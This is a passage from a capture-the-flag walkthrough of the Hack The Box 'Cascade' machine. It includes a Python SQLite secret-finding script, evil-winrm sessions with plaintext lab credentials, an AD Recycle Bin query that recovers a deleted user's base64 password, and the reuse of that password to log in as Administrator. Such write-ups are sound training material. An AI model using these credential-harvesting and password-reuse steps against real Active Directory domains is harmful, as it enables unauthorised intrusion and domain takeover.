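    for table, (cols, rows) in dump_tables(conn).items():
        for row in rows:
            for col, cell in zip(cols, row):
                if SECRET_COLUMN.search(col):
                    kind, shown = classify(cell)
                    hits.append((table, col, cell, kind, shown))
    return hits


def build_sample_db():
    """Constructed stand-in for Audit.db; column names are assumed, not from the page."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Ldap (Id INTEGER PRIMARY KEY, uname TEXT, pwd TEXT, domain TEXT);
        CREATE TABLE DeletedUserAudit (Id INTEGER PRIMARY KEY, Username TEXT, Name TEXT,
                                       DistinguishedName TEXT);
        INSERT INTO Ldap VALUES (1, 'ArkSvc', 'BQO5l5Kj9MdErXx6Q6AGOw==', 'cascade.local');
        INSERT INTO DeletedUserAudit VALUES (6, 'TempAdmin', 'TempAdmin',
            'CN=TempAdmin\\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local');
    """)
    return conn


if __name__ == "__main__":
    db = (sqlite3.connect(f"file:{sys.argv[1]}?mode=ro", uri=True)
          if len(sys.argv) > 1 else build_sample_db())
    for table, (cols, rows) in dump_tables(db).items():
        print(f"== {table} ({', '.join(cols)})")
        for row in rows:
            print("   ", row)
    for table, col, cell, kind, shown in find_secrets(db):
        print(f"[{kind}] {table}.{col}: {cell} -> {shown}")
```

Opening a real loot file read-only (mode=ro) matters when the evidence must stay untouched; the classification of the ArkSvc cell as 16 raw bytes is the cue that a decoder will not help and the application's own decryption routine is needed.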
┌─[root@liquid]─[~/Desktop/HTB/cascade]
└──╼ #evil-winrm -u arksvc -p w3lc0meFr31nd -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\arksvc\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
arksvc is a member of CASCADE\AD Recycle Bin. Otherwise s.smith and arksvc have the same privileges and nearly the same groups; that one group is the difference, and it grants read access to the Deleted Objects container, which by default only Domain Admins (and SYSTEM) can list. Deleted objects keep their attributes, custom ones included, for the deleted-object lifetime, so the recycle bin is worth reading for the same cascadeLegacyPwd attribute we found on a live user.
I used the following references to read the recycle bin:
Recycle Part of Active Directory :
*Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -ldapFilter:"(msDS-LastKnownRDN=*)" -IncludeDeletedObjects
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
*Evil-WinRM* PS C:\Users\arksvc\Desktop> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
<---->
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
<---->
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz : baCT3r1aN00dles [BASE64 DECODED]
GETTING ADMINISTRATOR ACCESS
TempAdmin itself is gone, but the password it carried can be tried against the accounts that remain, starting with the built-in Administrator:
┌─[root@liquid]─[~/Desktop/HTB/cascade/Logs/Ark AD Recycle Bin]
└──╼ #evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
CASC-DC1
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
08e7a535*****************82e075
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE